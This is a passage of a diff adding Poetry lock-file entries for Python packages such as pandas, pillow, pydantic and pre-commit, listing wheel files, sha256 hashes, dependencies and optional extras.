+ {file = "pandas-2.0.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e4c7c9f27a4185304c7caf96dc7d91bc60bc162221152de697c98eb0b2648dd8"},
+ {file = "pandas-2.0.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:f167beed68918d62bffb6ec64f2e1d8a7d297a038f86d4aed056b9493fca407f"},
+ {file = "pandas-2.0.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ce0c6f76a0f1ba361551f3e6dceaff06bde7514a374aa43e33b588ec10420183"},
+ {file = "pandas-2.0.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba619e410a21d8c387a1ea6e8a0e49bb42216474436245718d7f2e88a2f8d7c0"},
+ {file = "pandas-2.0.3-cp310-cp310-win32.whl", hash = "sha256:3ef285093b4fe5058eefd756100a367f27029913760773c8bf1d2d8bebe5d210"},
+ {file = "pandas-2.0.3-cp310-cp310-win_amd64.whl", hash = "sha256:9ee1a69328d5c36c98d8e74db06f4ad518a1840e8ccb94a4ba86920986bb617e"},
+ {file = "pandas-2.0.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b084b91d8d66ab19f5bb3256cbd5ea661848338301940e17f4492b2ce0801fe8"},
+ {file = "pandas-2.0.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:37673e3bdf1551b95bf5d4ce372b37770f9529743d2498032439371fc7b7eb26"},
+ {file = "pandas-2.0.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b9cb1e14fdb546396b7e1b923ffaeeac24e4cedd14266c3497216dd4448e4f2d"},
+ {file = "pandas-2.0.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d9cd88488cceb7635aebb84809d087468eb33551097d600c6dad13602029c2df"},
+ {file = "pandas-2.0.3-cp311-cp311-win32.whl", hash = "sha256:694888a81198786f0e164ee3a581df7d505024fbb1f15202fc7db88a71d84ebd"},
+ {file = "pandas-2.0.3-cp311-cp311-win_amd64.whl", hash = "sha256:6a21ab5c89dcbd57f78d0ae16630b090eec626360085a4148693def5452d8a6b"},
+ {file = "pandas-2.0.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9e4da0d45e7f34c069fe4d522359df7d23badf83abc1d1cef398895822d11061"},
+ {file = "pandas-2.0.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:32fca2ee1b0d93dd71d979726b12b61faa06aeb93cf77468776287f41ff8fdc5"},
+ {file = "pandas-2.0.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:258d3624b3ae734490e4d63c430256e716f488c4fcb7c8e9bde2d3aa46c29089"},
+ {file = "pandas-2.0.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9eae3dc34fa1aa7772dd3fc60270d13ced7346fcbcfee017d3132ec625e23bb0"},
+ {file = "pandas-2.0.3-cp38-cp38-win32.whl", hash = "sha256:f3421a7afb1a43f7e38e82e844e2bca9a6d793d66c1a7f9f0ff39a795bbc5e02"},
+ {file = "pandas-2.0.3-cp38-cp38-win_amd64.whl", hash = "sha256:69d7f3884c95da3a31ef82b7618af5710dba95bb885ffab339aad925c3e8ce78"},
+ {file = "pandas-2.0.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5247fb1ba347c1261cbbf0fcfba4a3121fbb4029d95d9ef4dc45406620b25c8b"},
+ {file = "pandas-2.0.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:81af086f4543c9d8bb128328b5d32e9986e0c84d3ee673a2ac6fb57fd14f755e"},
+ {file = "pandas-2.0.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1994c789bf12a7c5098277fb43836ce090f1073858c10f9220998ac74f37c69b"},
+ {file = "pandas-2.0.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5ec591c48e29226bcbb316e0c1e9423622bc7a4eaf1ef7c3c9fa1a3981f89641"},
+ {file = "pandas-2.0.3-cp39-cp39-win32.whl", hash = "sha256:04dbdbaf2e4d46ca8da896e1805bc04eb85caa9a82e259e8eed00254d5e0c682"},
+ {file = "pandas-2.0.3-cp39-cp39-win_amd64.whl", hash = "sha256:1168574b036cd8b93abc746171c9b4f1b83467438a5e45909fed645cf8692dbc"},
+ {file = "pandas-2.0.3.tar.gz", hash = "sha256:c02f372a88e0d17f36d3093a644c73cfc1788e876a7c4bcb4020a77512e2043c"},
+]
+
+[package.dependencies]
+numpy = [
+ {version = ">=1.20.3", markers = "python_version < \"3.10\""},
+ {version = ">=1.21.0", markers = "python_version >= \"3.10\" and python_version < \"3.11\""},
+ {version = ">=1.23.2", markers = "python_version >= \"3.11\""},
+]
+python-dateutil = ">=2.8.2"
+pytz = ">=2020.1"
+tzdata = ">=2022.1"
+
+[package.extras]
+all = ["PyQt5 (>=5.15.1)", "SQLAlchemy (>=1.4.16)", "beautifulsoup4 (>=4.9.3)", "bottleneck (>=1.3.2)", "brotlipy (>=0.7.0)", "fastparquet (>=0.6.3)", "fsspec (>=2021.07.0)", "gcsfs (>=2021.07.0)", "html5lib (>=1.1)", "hypothesis (>=6.34.2)", "jinja2 (>=3.0.0)", "lxml (>=4.6.3)", "matplotlib (>=3.6.1)", "numba (>=0.53.1)", "numexpr (>=2.7.3)", "odfpy (>=1.4.1)", "openpyxl (>=3.0.7)", "pandas-gbq (>=0.15.0)", "psycopg2 (>=2.8.6)", "pyarrow (>=7.0.0)", "pymysql (>=1.0.2)", "pyreadstat (>=1.1.2)", "pytest (>=7.3.2)", "pytest-asyncio (>=0.17.0)", "pytest-xdist (>=2.2.0)", "python-snappy (>=0.6.0)", "pyxlsb (>=1.0.8)", "qtpy (>=2.2.0)", "s3fs (>=2021.08.0)", "scipy (>=1.7.1)", "tables (>=3.6.1)", "tabulate (>=0.8.9)", "xarray (>=0.21.0)", "xlrd (>=2.0.1)", "xlsxwriter (>=1.4.3)", "zstandard (>=0.15.2)"]
+aws = ["s3fs (>=2021.08.0)"]
+clipboard = ["PyQt5 (>=5.15.1)", "qtpy (>=2.2.0)"]
+compression = ["brotlipy (>=0.7.0)", "python-snappy (>=0.6.0)", "zstandard (>=0.15.2)"]
+computation = ["scipy (>=1.7.1)", "xarray (>=0.21.0)"]
+excel = ["odfpy (>=1.4.1)", "openpyxl (>=3.0.7)", "pyxlsb (>=1.0.8)", "xlrd (>=2.0.1)", "xlsxwriter (>=1.4.3)"]
+feather = ["pyarrow (>=7.0.0)"]
+fss = ["fsspec (>=2021.07.0)"]
+gcp = ["gcsfs (>=2021.07.0)", "pandas-gbq (>=0.15.0)"]
+hdf5 = ["tables (>=3.6.1)"]
+html = ["beautifulsoup4 (>=4.9.3)", "html5lib (>=1.1)", "lxml (>=4.6.3)"]
+mysql = ["SQLAlchemy (>=1.4.16)", "pymysql (>=1.0.2)"]
+output-formatting = ["jinja2 (>=3.0.0)", "tabulate (>=0.8.9)"]
+parquet = ["pyarrow (>=7.0.0)"]
+performance = ["bottleneck (>=1.3.2)", "numba (>=0.53.1)", "numexpr (>=2.7.1)"]
+plot = ["matplotlib (>=3.6.1)"]
+postgresql = ["SQLAlchemy (>=1.4.16)", "psycopg2 (>=2.8.6)"]
+spss = ["pyreadstat (>=1.1.2)"]
+sql-other = ["SQLAlchemy (>=1.4.16)"]
+test = ["hypothesis (>=6.34.2)", "pytest (>=7.3.2)", "pytest-asyncio (>=0.17.0)", "pytest-xdist (>=2.2.0)"]
+xml = ["lxml (>=4.6.3)"]
+
+[[package]]
+name = "pathspec"
+version = "0.12.1"
+description = "Utility library for gitignore style pattern matching of file paths."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pathspec-0.12.1-py3-none-any.whl", hash = "sha256:a0d503e138a4c123b27490a4f7beda6a01c6f288df0e4a8b79c7eb0dc7b4cc08"},
+ {file = "pathspec-0.12.1.tar.gz", hash = "sha256:a482d51503a1ab33b1c67a6c3813a26953dbdc71c31dacaef9a838c4e29f5712"},
+]
+
+[[package]]
+name = "pillow"
+version = "10.4.0"
+description = "Python Imaging Library (Fork)"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pillow-10.4.0-cp310-cp310-macosx_10_10_x86_64.whl", hash = "sha256:4d9667937cfa347525b319ae34375c37b9ee6b525440f3ef48542fcf66f2731e"},
+ {file = "pillow-10.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:543f3dc61c18dafb755773efc89aae60d06b6596a63914107f75459cf984164d"},
+ {file = "pillow-10.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7928ecbf1ece13956b95d9cbcfc77137652b02763ba384d9ab508099a2eca856"},
+ {file = "pillow-10.4.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e4d49b85c4348ea0b31ea63bc75a9f3857869174e2bf17e7aba02945cd218e6f"},
+ {file = "pillow-10.4.0-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:6c762a5b0997f5659a5ef2266abc1d8851ad7749ad9a6a5506eb23d314e4f46b"},
+ {file = "pillow-10.4.0-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:a985e028fc183bf12a77a8bbf36318db4238a3ded7fa9df1b9a133f1cb79f8fc"},
+ {file = "pillow-10.4.0-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:812f7342b0eee081eaec84d91423d1b4650bb9828eb53d8511bcef8ce5aecf1e"},
+ {file = "pillow-10.4.0-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:ac1452d2fbe4978c2eec89fb5a23b8387aba707ac72810d9490118817d9c0b46"},
+ {file = "pillow-10.4.0-cp310-cp310-win32.whl", hash = "sha256:bcd5e41a859bf2e84fdc42f4edb7d9aba0a13d29a2abadccafad99de3feff984"},
+ {file = "pillow-10.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:ecd85a8d3e79cd7158dec1c9e5808e821feea088e2f69a974db5edf84dc53141"},
+ {file = "pillow-10.4.0-cp310-cp310-win_arm64.whl", hash = "sha256:ff337c552345e95702c5fde3158acb0625111017d0e5f24bf3acdb9cc16b90d1"},
+ {file = "pillow-10.4.0-cp311-cp311-macosx_10_10_x86_64.whl", hash = "sha256:0a9ec697746f268507404647e531e92889890a087e03681a3606d9b920fbee3c"},
+ {file = "pillow-10.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:dfe91cb65544a1321e631e696759491ae04a2ea11d36715eca01ce07284738be"},
+ {file = "pillow-10.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5dc6761a6efc781e6a1544206f22c80c3af4c8cf461206d46a1e6006e4429ff3"},
+ {file = "pillow-10.4.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5e84b6cc6a4a3d76c153a6b19270b3526a5a8ed6b09501d3af891daa2a9de7d6"},
+ {file = "pillow-10.4.0-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:bbc527b519bd3aa9d7f429d152fea69f9ad37c95f0b02aebddff592688998abe"},
+ {file = "pillow-10.4.0-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:76a911dfe51a36041f2e756b00f96ed84677cdeb75d25c767f296c1c1eda1319"},
+ {file = "pillow-10.4.0-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:59291fb29317122398786c2d44427bbd1a6d7ff54017075b22be9d21aa59bd8d"},
+ {file = "pillow-10.4.0-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:416d3a5d0e8cfe4f27f574362435bc9bae57f679a7158e0096ad2beb427b8696"},
+ {file = "pillow-10.4.0-cp311-cp311-win32.whl", hash = "sha256:7086cc1d5eebb91ad24ded9f58bec6c688e9f0ed7eb3dbbf1e4800280a896496"},
+ {file = "pillow-10.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:cbed61494057c0f83b83eb3a310f0bf774b09513307c434d4366ed64f4128a91"},
+ {file = "pillow-10.4.0-cp311-cp311-win_arm64.whl", hash = "sha256:f5f0c3e969c8f12dd2bb7e0b15d5c468b51e5017e01e2e867335c81903046a22"},
+ {file = "pillow-10.4.0-cp312-cp312-macosx_10_10_x86_64.whl", hash = "sha256:673655af3eadf4df6b5457033f086e90299fdd7a47983a13827acf7459c15d94"},
+ {file = "pillow-10.4.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:866b6942a92f56300012f5fbac71f2d610312ee65e22f1aa2609e491284e5597"},
+ {file = "pillow-10.4.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:29dbdc4207642ea6aad70fbde1a9338753d33fb23ed6956e706936706f52dd80"},
+ {file = "pillow-10.4.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bf2342ac639c4cf38799a44950bbc2dfcb685f052b9e262f446482afaf4bffca"},
+ {file = "pillow-10.4.0-cp312-cp312-manylinux_2_28_aarch64.whl", hash = "sha256:f5b92f4d70791b4a67157321c4e8225d60b119c5cc9aee8ecf153aace4aad4ef"},
+ {file = "pillow-10.4.0-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:86dcb5a1eb778d8b25659d5e4341269e8590ad6b4e8b44d9f4b07f8d136c414a"},
+ {file = "pillow-10.4.0-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:780c072c2e11c9b2c7ca37f9a2ee8ba66f44367ac3e5c7832afcfe5104fd6d1b"},
+ {file = "pillow-10.4.0-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:37fb69d905be665f68f28a8bba3c6d3223c8efe1edf14cc4cfa06c241f8c81d9"},
+ {file = "pillow-10.4.0-cp312-cp312-win32.whl", hash = "sha256:7dfecdbad5c301d7b5bde160150b4db4c659cee2b69589705b6f8a0c509d9f42"},
+ {file = "pillow-10.4.0-cp312-cp312-win_amd64.whl", hash = "sha256:1d846aea995ad352d4bdcc847535bd56e0fd88d36829d2c90be880ef1ee4668a"},
+ {file = "pillow-10.4.0-cp312-cp312-win_arm64.whl", hash = "sha256:e553cad5179a66ba15bb18b353a19020e73a7921296a7979c4a2b7f6a5cd57f9"},
+ {file = "pillow-10.4.0-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:8bc1a764ed8c957a2e9cacf97c8b2b053b70307cf2996aafd70e91a082e70df3"},
+ {file = "pillow-10.4.0-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:6209bb41dc692ddfee4942517c19ee81b86c864b626dbfca272ec0f7cff5d9fb"},
+ {file = "pillow-10.4.0-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bee197b30783295d2eb680b311af15a20a8b24024a19c3a26431ff83eb8d1f70"},
+ {file = "pillow-10.4.0-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1ef61f5dd14c300786318482456481463b9d6b91ebe5ef12f405afbba77ed0be"},
+ {file = "pillow-10.4.0-cp313-cp313-manylinux_2_28_aarch64.whl", hash = "sha256:297e388da6e248c98bc4a02e018966af0c5f92dfacf5a5ca22fa01cb3179bca0"},
+ {file = "pillow-10.4.0-cp313-cp313-manylinux_2_28_x86_64.whl", hash = "sha256:e4db64794ccdf6cb83a59d73405f63adbe2a1887012e308828596100a0b2f6cc"},
+ {file = "pillow-10.4.0-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:bd2880a07482090a3bcb01f4265f1936a903d70bc740bfcb1fd4e8a2ffe5cf5a"},
+ {file = "pillow-10.4.0-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:4b35b21b819ac1dbd1233317adeecd63495f6babf21b7b2512d244ff6c6ce309"},
+ {file = "pillow-10.4.0-cp313-cp313-win32.whl", hash = "sha256:551d3fd6e9dc15e4c1eb6fc4ba2b39c0c7933fa113b220057a34f4bb3268a060"},
+ {file = "pillow-10.4.0-cp313-cp313-win_amd64.whl", hash = "sha256:030abdbe43ee02e0de642aee345efa443740aa4d828bfe8e2eb11922ea6a21ea"},
+ {file = "pillow-10.4.0-cp313-cp313-win_arm64.whl", hash = "sha256:5b001114dd152cfd6b23befeb28d7aee43553e2402c9f159807bf55f33af8a8d"},
+ {file = "pillow-10.4.0-cp38-cp38-macosx_10_10_x86_64.whl", hash = "sha256:8d4d5063501b6dd4024b8ac2f04962d661222d120381272deea52e3fc52d3736"},
+ {file = "pillow-10.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:7c1ee6f42250df403c5f103cbd2768a28fe1a0ea1f0f03fe151c8741e1469c8b"},
+ {file = "pillow-10.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b15e02e9bb4c21e39876698abf233c8c579127986f8207200bc8a8f6bb27acf2"},
+ {file = "pillow-10.4.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7a8d4bade9952ea9a77d0c3e49cbd8b2890a399422258a77f357b9cc9be8d680"},
+ {file = "pillow-10.4.0-cp38-cp38-manylinux_2_28_aarch64.whl", hash = "sha256:43efea75eb06b95d1631cb784aa40156177bf9dd5b4b03ff38979e048258bc6b"},
+ {file = "pillow-10.4.0-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:950be4d8ba92aca4b2bb0741285a46bfae3ca699ef913ec8416c1b78eadd64cd"},
+ {file = "pillow-10.4.0-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:d7480af14364494365e89d6fddc510a13e5a2c3584cb19ef65415ca57252fb84"},
+ {file = "pillow-10.4.0-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:73664fe514b34c8f02452ffb73b7a92c6774e39a647087f83d67f010eb9a0cf0"},
+ {file = "pillow-10.4.0-cp38-cp38-win32.whl", hash = "sha256:e88d5e6ad0d026fba7bdab8c3f225a69f063f116462c49892b0149e21b6c0a0e"},
+ {file = "pillow-10.4.0-cp38-cp38-win_amd64.whl", hash = "sha256:5161eef006d335e46895297f642341111945e2c1c899eb406882a6c61a4357ab"},
+ {file = "pillow-10.4.0-cp39-cp39-macosx_10_10_x86_64.whl", hash = "sha256:0ae24a547e8b711ccaaf99c9ae3cd975470e1a30caa80a6aaee9a2f19c05701d"},
+ {file = "pillow-10.4.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:298478fe4f77a4408895605f3482b6cc6222c018b2ce565c2b6b9c354ac3229b"},
+ {file = "pillow-10.4.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:134ace6dc392116566980ee7436477d844520a26a4b1bd4053f6f47d096997fd"},
+ {file = "pillow-10.4.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:930044bb7679ab003b14023138b50181899da3f25de50e9dbee23b61b4de2126"},
+ {file = "pillow-10.4.0-cp39-cp39-manylinux_2_28_aarch64.whl", hash = "sha256:c76e5786951e72ed3686e122d14c5d7012f16c8303a674d18cdcd6d89557fc5b"},
+ {file = "pillow-10.4.0-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:b2724fdb354a868ddf9a880cb84d102da914e99119211ef7ecbdc613b8c96b3c"},
+ {file = "pillow-10.4.0-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:dbc6ae66518ab3c5847659e9988c3b60dc94ffb48ef9168656e0019a93dbf8a1"},
+ {file = "pillow-10.4.0-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:06b2f7898047ae93fad74467ec3d28fe84f7831370e3c258afa533f81ef7f3df"},
+ {file = "pillow-10.4.0-cp39-cp39-win32.whl", hash = "sha256:7970285ab628a3779aecc35823296a7869f889b8329c16ad5a71e4901a3dc4ef"},
+ {file = "pillow-10.4.0-cp39-cp39-win_amd64.whl", hash = "sha256:961a7293b2457b405967af9c77dcaa43cc1a8cd50d23c532e62d48ab6cdd56f5"},
+ {file = "pillow-10.4.0-cp39-cp39-win_arm64.whl", hash = "sha256:32cda9e3d601a52baccb2856b8ea1fc213c90b340c542dcef77140dfa3278a9e"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-macosx_10_15_x86_64.whl", hash = "sha256:5b4815f2e65b30f5fbae9dfffa8636d992d49705723fe86a3661806e069352d4"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:8f0aef4ef59694b12cadee839e2ba6afeab89c0f39a3adc02ed51d109117b8da"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9f4727572e2918acaa9077c919cbbeb73bd2b3ebcfe033b72f858fc9fbef0026"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ff25afb18123cea58a591ea0244b92eb1e61a1fd497bf6d6384f09bc3262ec3e"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:dc3e2db6ba09ffd7d02ae9141cfa0ae23393ee7687248d46a7507b75d610f4f5"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:02a2be69f9c9b8c1e97cf2713e789d4e398c751ecfd9967c18d0ce304efbf885"},
+ {file = "pillow-10.4.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:0755ffd4a0c6f267cccbae2e9903d95477ca2f77c4fcf3a3a09570001856c8a5"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-macosx_10_15_x86_64.whl", hash = "sha256:a02364621fe369e06200d4a16558e056fe2805d3468350df3aef21e00d26214b"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-macosx_11_0_arm64.whl", hash = "sha256:1b5dea9831a90e9d0721ec417a80d4cbd7022093ac38a568db2dd78363b00908"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9b885f89040bb8c4a1573566bbb2f44f5c505ef6e74cec7ab9068c900047f04b"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:87dd88ded2e6d74d31e1e0a99a726a6765cda32d00ba72dc37f0651f306daaa8"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:2db98790afc70118bd0255c2eeb465e9767ecf1f3c25f9a1abb8ffc8cfd1fe0a"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:f7baece4ce06bade126fb84b8af1c33439a76d8a6fd818970215e0560ca28c27"},
+ {file = "pillow-10.4.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:cfdd747216947628af7b259d274771d84db2268ca062dd5faf373639d00113a3"},
+ {file = "pillow-10.4.0.tar.gz", hash = "sha256:166c1cd4d24309b30d61f79f4a9114b7b2313d7450912277855ff5dfd7cd4a06"},
+]
+
+[package.extras]
+docs = ["furo", "olefile", "sphinx (>=7.3)", "sphinx-copybutton", "sphinx-inline-tabs", "sphinxext-opengraph"]
+fpx = ["olefile"]
+mic = ["olefile"]
+tests = ["check-manifest", "coverage", "defusedxml", "markdown2", "olefile", "packaging", "pyroma", "pytest", "pytest-cov", "pytest-timeout"]
+typing = ["typing-extensions"]
+xmp = ["defusedxml"]
+
+[[package]]
+name = "platformdirs"
+version = "4.3.6"
+description = "A small Python package for determining appropriate platform-specific dirs, e.g. a `user data dir`."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "platformdirs-4.3.6-py3-none-any.whl", hash = "sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb"},
+ {file = "platformdirs-4.3.6.tar.gz", hash = "sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907"},
+]
+
+[package.extras]
+docs = ["furo (>=2024.8.6)", "proselint (>=0.14)", "sphinx (>=8.0.2)", "sphinx-autodoc-typehints (>=2.4)"]
+test = ["appdirs (==1.4.4)", "covdefaults (>=2.3)", "pytest (>=8.3.2)", "pytest-cov (>=5)", "pytest-mock (>=3.14)"]
+type = ["mypy (>=1.11.2)"]
+
+[[package]]
+name = "pluggy"
+version = "1.5.0"
+description = "plugin and hook calling mechanisms for python"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pluggy-1.5.0-py3-none-any.whl", hash = "sha256:44e1ad92c8ca002de6377e165f3e0f1be63266ab4d554740532335b9d75ea669"},
+ {file = "pluggy-1.5.0.tar.gz", hash = "sha256:2cffa88e94fdc978c4c574f15f9e59b7f4201d439195c3715ca9e2486f1d0cf1"},
+]
+
+[package.extras]
+dev = ["pre-commit", "tox"]
+testing = ["pytest", "pytest-benchmark"]
+
+[[package]]
+name = "pre-commit"
+version = "3.5.0"
+description = "A framework for managing and maintaining multi-language pre-commit hooks."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pre_commit-3.5.0-py2.py3-none-any.whl", hash = "sha256:841dc9aef25daba9a0238cd27984041fa0467b4199fc4852e27950664919f660"},
+ {file = "pre_commit-3.5.0.tar.gz", hash = "sha256:5804465c675b659b0862f07907f96295d490822a450c4c40e747d0b1c6ebcb32"},
+]
+
+[package.dependencies]
+cfgv = ">=2.0.0"
+identify = ">=1.0.0"
+nodeenv = ">=0.11.1"
+pyyaml = ">=5.1"
+virtualenv = ">=20.10.0"
+
+[[package]]
+name = "pydantic"
+version = "2.10.4"
+description = "Data validation using Python type hints"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pydantic-2.10.4-py3-none-any.whl", hash = "sha256:597e135ea68be3a37552fb524bc7d0d66dcf93d395acd93a00682f1efcb8ee3d"},
+ {file = "pydantic-2.10.4.tar.gz", hash = "sha256:82f12e9723da6de4fe2ba888b5971157b3be7ad914267dea8f05f82b28254f06"},
+]
+
+[package.dependencies]
+annotated-types = ">=0.6.0"
+pydantic-core = "2.27.2"
+typing-extensions = ">=4.12.2"
+
+[package.extras]
+email = ["email-validator (>=2.0.0)"]
+timezone = ["tzdata"]
+
+[[package]]
+name = "pydantic-core"
+version = "2.27.2"
+description = "Core functionality for Pydantic validation and serialization"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "pydantic_core-2.27.2-cp310-cp310-macosx_10_12_x86_64.whl", hash = "sha256:2d367ca20b2f14095a8f4fa1210f5a7b78b8a20009ecced6b12818f455b1e9fa"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:491a2b73db93fab69731eaee494f320faa4e093dbed776be1a829c2eb222c34c"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7969e133a6f183be60e9f6f56bfae753585680f3b7307a8e555a948d443cc05a"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:3de9961f2a346257caf0aa508a4da705467f53778e9ef6fe744c038119737ef5"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e2bb4d3e5873c37bb3dd58714d4cd0b0e6238cebc4177ac8fe878f8b3aa8e74c"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:280d219beebb0752699480fe8f1dc61ab6615c2046d76b7ab7ee38858de0a4e7"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:47956ae78b6422cbd46f772f1746799cbb862de838fd8d1fbd34a82e05b0983a"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:14d4a5c49d2f009d62a2a7140d3064f686d17a5d1a268bc641954ba181880236"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:337b443af21d488716f8d0b6164de833e788aa6bd7e3a39c005febc1284f4962"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-musllinux_1_1_armv7l.whl", hash = "sha256:03d0f86ea3184a12f41a2d23f7ccb79cdb5a18e06993f8a45baa8dfec746f0e9"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:7041c36f5680c6e0f08d922aed302e98b3745d97fe1589db0a3eebf6624523af"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-win32.whl", hash = "sha256:50a68f3e3819077be2c98110c1f9dcb3817e93f267ba80a2c05bb4f8799e2ff4"},
+ {file = "pydantic_core-2.27.2-cp310-cp310-win_amd64.whl", hash = "sha256:e0fd26b16394ead34a424eecf8a31a1f5137094cabe84a1bcb10fa6ba39d3d31"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-macosx_10_12_x86_64.whl", hash = "sha256:8e10c99ef58cfdf2a66fc15d66b16c4a04f62bca39db589ae8cba08bc55331bc"},
+ {file = "pydantic_core-2.27.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:26f32e0adf166a84d0cb63be85c562ca8a6fa8de28e5f0d92250c6b7e9e2aff7"},
